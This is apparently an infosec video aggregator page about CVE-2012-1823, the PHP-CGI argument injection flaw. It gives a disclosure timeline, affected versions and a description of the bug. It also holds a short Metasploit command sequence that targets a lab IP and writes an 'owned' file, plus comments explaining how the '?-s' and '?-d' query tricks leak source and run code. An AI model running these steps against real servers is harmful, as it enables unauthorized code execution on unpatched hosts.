Description: Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Timeline :
Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13
Vulnerability reported to the vendor the 2012-01-17
Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03
Coordinated public release of the vulnerability the 2012-05-03
Metasploit PoC provided the 2012-05-04
PoC provided by:
egypt
hdm
Reference(s) :
CVE-2012-1823
OSVDB-81633
Affected versions :
PHP versions before 5.3.12
PHP versions before 5.4.2
Tested on CentOS release 6.2 (Final) with :
php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012
Description :
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary."
Note : This vulnerability was potentially exploited in the wild for at least 8 years !
Metasploit demo :
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo owned /var/www/html/owned.html
exploit
Tags: php , exploit , injection ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
The bug is two fold, first using a "?-s" after a php file you can read the source of the file. Second with the "?-d" you can make some temporary changes to the execution of php, whereby leading to code execution.
thanks
PHP CGI argument injection remote exploit Works on versions up to 5.3.12 and 5.4.2 And online there is lots of Php CGI remote exploits version available.